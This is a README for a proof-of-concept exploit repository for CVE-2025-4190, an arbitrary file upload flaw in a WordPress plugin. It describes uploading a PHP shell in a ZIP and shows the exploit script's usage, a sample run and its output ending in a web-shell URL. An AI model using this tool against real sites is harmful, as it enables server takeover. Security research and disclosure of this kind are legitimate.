
# CVE-2025-4190 — WordPress CSV Mass Importer ≤ 1.2 Arbitrary File Upload

![WordPress Plugin](https://img.shields.io/badge/WordPress-Plugin-blue)  
![CVE](https://img.shields.io/badge/CVE-2025--4190-red)  
![Status](https://img.shields.io/badge/Status-Verified-brightgreen)  
![Author](https://img.shields.io/badge/Author-Khaled_Alenazi_(Nxploited)-purple)

---

## 📌 Description

The **CSV Mass Importer** plugin (≤ 1.2) for WordPress contains an **Admin+ Arbitrary File Upload** vulnerability.  
Due to improper validation of uploaded files, high-privilege users (such as admin) can upload **arbitrary files** on the server, even when this should be restricted — for example in multisite setups.

This vulnerability allows an attacker to upload PHP shells or malicious files, leading to **remote code execution (RCE)** on the server.

_Discovered by **Nxploited (Khaled Alenazi)**._

---

## 🔥 Details

- **Plugin Name:** CSV Mass Importer  
- **Affected Version:** ≤ 1.2  
- **Vulnerability Type:** Admin+ Arbitrary File Upload  
- **CVE:** [CVE-2025-4190](https://wpscan.com/vulnerability/e525ece5-6e03-4aee-bf5b-6ae0b961f027/)  
- **WPVDB ID:** e525ece5-6e03-4aee-bf5b-6ae0b961f027  
- **Original Researcher:** Khaled Alenazi (Nxploited)  
- **Submitter Website:** [https://github.com/Nxploited](https://github.com/Nxploited)  
- **Verified:** ✅  

---

## 💻 Proof of Concept (PoC)

The plugin fails to properly check uploaded files when using the CSV import feature.  
A crafted ZIP file containing a PHP shell can be uploaded and extracted to a publicly accessible directory.

**Shell Path Example:**  
```
<target-url>/wp-content/uploads/cmi-data/nxploited.php
```

---

## 🚀 Usage

### Script

This repository contains a ready Python exploit script: `4190.py`

### Help Menu

```bash
python CVE-2025-4190.py --help
usage: 4190.py [-h] --url URL --username USERNAME --password PASSWORD

WordPress CSV Mass Importer <= 1.2 - Admin+ Arbitrary File Upload # By Nxploited (Khaled Alenazi)

options:
  -h, --help            show this help message and exit
  --url, -u URL         Target WordPress site URL
  --username, -un USERNAME
                        WordPress admin username
  --password, -p PASSWORD
                        WordPress admin password
```

### Example Run

```bash
python CVE-2025-4190.py -u http://192.168.100.74:888/wordpress -un admin -p admin
```

### Expected Output

```
[+] Logged in successfully.
[+] Payload 'nxploited.zip' created successfully.
[+] Payload uploaded successfully.
[+] Shell URL: http://192.168.100.74:888/wordpress/wp-content/uploads/cmi-data/nxploited.php
Exploited By Nxploited (Khaled_alenazi)
```

---

## 🕰 Timeline

- **Publicly Published:** 2025-04-26 (about 11 days ago)  
- **Added to Database:** 2025-05-07 (about 1 hour ago)  
- **Last Updated:** 2025-05-07 (about 1 hour ago)  

---

## 🛡 References

- [CVE-2025-4190 on WPScan](https://wpscan.com/vulnerability/e525ece5-6e03-4aee-bf5b-6ae0b961f027/)

---

## ⚠ Disclaimer

This code is provided for **educational purposes** only.  
The author is not responsible for any misuse or damage caused by this script.  
**Use responsibly and only on systems you are authorized to test.**

---

_Discovered and developed by Khaled Alenazi (Nxploited)_ 🌟

